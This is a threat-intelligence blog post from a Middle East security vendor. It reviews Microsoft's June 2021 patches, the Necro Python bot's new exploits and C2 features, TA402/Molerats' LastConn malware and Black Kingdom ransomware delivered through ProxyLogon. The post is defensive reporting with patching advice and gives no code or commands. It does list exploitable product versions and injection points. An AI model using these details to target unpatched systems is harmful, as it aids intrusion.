Top Middle East Cyber Threats – 21 June 2021
At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.
In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:
Microsoft Security Updates – June 2021
Microsoft kicked off its June 2021 patch cycle by releasing updates for 50 critical and important severity vulnerabilities. This patch cycle addressed multiple security issues in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code – Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.
The official notification noted 5 critical and 45 important severity vulnerabilities. Six of the total vulnerabilities, according to Microsoft, are currently being actively exploited, while three are publicly known at the time of release.
Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerabilities (CVE-2021-31199/CVE-2021-31201) are related to the Adobe Reader bug, which was listed as being under active attack last month (CVE-2021-28550 specifically). Privilege escalation in conjunction with code execution bugs is quite common, and it appears that these two vulnerabilities were the privilege escalation part of those exploits.
In Windows MSHTML Platform Remote Code Execution Vulnerability (CVE-2021-33742), viewing specially crafted web content may allow an attacker to execute code on a target system. Because the flaw is in the Trident (MSHTML) engine, several applications, not just Internet Explorer, were affected.
An attacker could exploit the Kerberos AppContainer Security Feature Bypass Vulnerability (CVE-2021-31962) to bypass Kerberos authentication and potentially authenticate to any service principal name (SPN). This vulnerability is the most serious in June, with a CVSS of 9.4.
Another known flaw under active attack this month is the Windows NTFS Elevation of Privilege Vulnerability (CVE-2021-31956). This vulnerability can be easily used in conjunction with similar vulnerabilities such as CVE-2021-31955 as a common technique to leverage a memory leak and obtain address required to escalate privileges.
A browse-and-own bug in the scripting engine and a remote code execution (RCE) vulnerability in SharePoint are among the remaining Critical-rated bugs. The SharePoint bug does not mandate user interaction, but it does necessitate some level of privilege.
There are several patches affecting Office components, the most noticeable of which is the Outlook update. To carry out the compromise, an attacker would need to persuade someone to open a specially crafted file with an affected version of Outlook. A couple of patches for the 3D Viewer and Paint 3D round out the Important severity code execution patches. In addition to the previously mentioned bugs, ten more elevation of privilege (EoP) vulnerabilities are patched this month. The vulnerability CVE-2021-33739, which is patched by the Desktop Windows Manager (DWM), is also widely known and actively exploited.
To escalate privileges, the other EoPs addressed this month require the attacker to run their code on an affected system. These vulnerabilities affect several Windows components, including the Windows Kernel and Microsoft’s Kubernetes tools. This month, seven patches are available to address information disclosure bugs, with the vulnerability (CVE-2021-31955) for the Windows Kernel listed as being actively exploited. All these flaws result in leaks of unknown memory contents. The one exception to this is the information leak in SharePoint (CVE-2021-31965), which could result in the exposure of Personally Identifiable Information (PII).
With the current patch release in June 2021, there are five patches fixing Denial-of-Service (DoS) bugs. The most notable affected components are Hyper-V and Windows Defender (CVE-2021-31977/CVE-2021-31978).
RECOMMENDATIONS
- Review the April 2021 “Release Notes” and “Deployment Information” for more details and apply the necessary patches as soon as possible.
- If you use Microsoft Intune for device management, apply the CVE-2021-31949 patch as soon as possible. Although the attack scenario is not specified, it does not necessarily require authentication or user interaction.
- Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
Necro Python Bot Updates
The most recent activity of Necro Bot reveals numerous changes to the bot, including new command and control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel, and SMB-based exploits that were not present in previous variants of the code.
The infection occurs when a vulnerability in one of the targeted applications or operating systems is successfully exploited. The bot is aimed at attacking Linux and Windows distributions. For the initial infection stage, a Java-based downloader is leveraged. The malware employs a standalone Python interpreter, a malicious script, and ELF executable created with PyInstaller. The bot can connect to a C2 server through IRC and accept commands pertaining to exploitation, executing Distributed Denial-of-Service attacks, configuration modifications, and RAT functionality to download and launch additional code or sniff network traffic in order to exfiltrate the acquired data.
The bot conceals its existence on the system by installing a user-mode rootkit meant to hide the harmful process as well as malicious registry entries built to ensure that the bot executes every time a user enters the infected machine. A substantial portion of the code is committed to downloading and running the Monero miner XMRig program.
On compromised systems, the bots additionally implant code into HTML and PHP files to download and run a JavaScript-based miner from an attacker-controlled server. When the infected application is launched, a JavaScript-based Monero miner is launched within the user’s browser’s process space.
The following additional exploits were added to the arsenal of the most recent variants:
| Exploited Applications | Version Details | Type |
| VestaCP | VestaCP 0.9.8 | v_sftp_licence’ Command Injection |
| ZeroShell | Version 3.9.0 | cgi-bin/kerbynet’ Remote Root Command Injection |
| SCO Openserver | Version 5.0.7 | outputform’ Command Injection |
| Genexis PLATINUM | Version 4410 2.1 P4410-V2-1.28 | Remote Command Execution vulnerability |
| OTRS | Version 6.0.1 | Remote Command Execution vulnerability |
| VMWare vCenter | Version 6.5 to 7.0 | Remote Command Execution vulnerability |
| Nrdh.php | No Details Available | Remote Code Execution Exploit for an Application with no further details available |
The observation suggests a self-replicating, polymorphic bot that tries to spread by exploiting server-side software. The report also includes some interesting information on a bot that contains exploits for more than ten different web applications and the SMB protocol.
RECOMMENDATIONS
- Prioritize timely patching for identified vulnerabilities of Internet-facing servers as well as internet data processing tools, such as web browsers, application plug-ins, and document readers. Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
- Keep antivirus signatures and engines up to date.
- Enable a personal firewall on user workstations, configured to deny unsolicited connection requests.
- Block the indicators of compromise within respective security controls organization wide.
New TA402 Molerats Malware Targets Governments in the Middle East
TA402 – also known as Molerats, APT-C-23, Gaza Hackers Team, Gaza Cybergang, DustySky, Extreme Jackal, and Moonlight – is an Arabic-speaking, politically motivated group that has operated in the Middle East since 2012. Targets include government and government-adjacent organizations in Israel, Palestine, UAE, Turkey, and Egypt.
TA402 leverages political and military themes, including the ongoing conflict in the Gaza Strip, to entice users to open attachments and click on malicious links.
TA402’s custom malware called LastConn is used to gain access to and conduct information gathering activities.
LastConn uses a number of unique features to deter automated threat analysis and make manual analysis difficult.
TA402 resumed email threat campaigns in early June 2021 with continued use of LastConn malware. Researchers assess with high confidence LastConn is an updated version of SharpStage malware first reported by Cybereason in December 2020.
The primary motivation of this group is to collect sensitive information and documents from high values targets to gather intelligence.
In June campaigns, TA402 leveraged a PDF attachment with one or multiple geofenced URLs leading to password-protected archives that contained the malware.
RECOMMENDATIONS
- Prioritize timely patching for identified vulnerabilities of Internet-facing servers as well as internet data processing tools, such as web browsers, application plug-ins, and document readers. Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
- Keep antivirus signatures and engines up to date.
- Enable a personal firewall on user workstations, configured to deny unsolicited connection requests.
- Block the indicators of compromise within respective security controls organization wide.
Black Kingdom ransomware
The use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability known as ProxyLogon was publicly reported at the end of March.
Black Kingdom is not a new player: it was observed in action following other vulnerability exploitations in 2020, such as CVE-2019-11510.
Public reports indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell in the compromised system. The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script for downloading and running the Black Kingdom executable.
RECOMMENDATIONS
- Prioritize timely patching for identified vulnerabilities of Internet-facing servers as well as internet data processing tools, such as web browsers, application plug-ins, and document readers. Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
- Keep antivirus signatures and engines up to date.
- Enable a personal firewall on user workstations, configured to deny unsolicited connection requests.
- Block the indicators of compromise within respective security controls organization wide.
References:
- https://www.zerodayinitiative.com/blog/2021/6/8/the-june-2021-security-update-review
- https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html
- https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east
- https://securelist.com/black-kingdom-ransomware/102873/
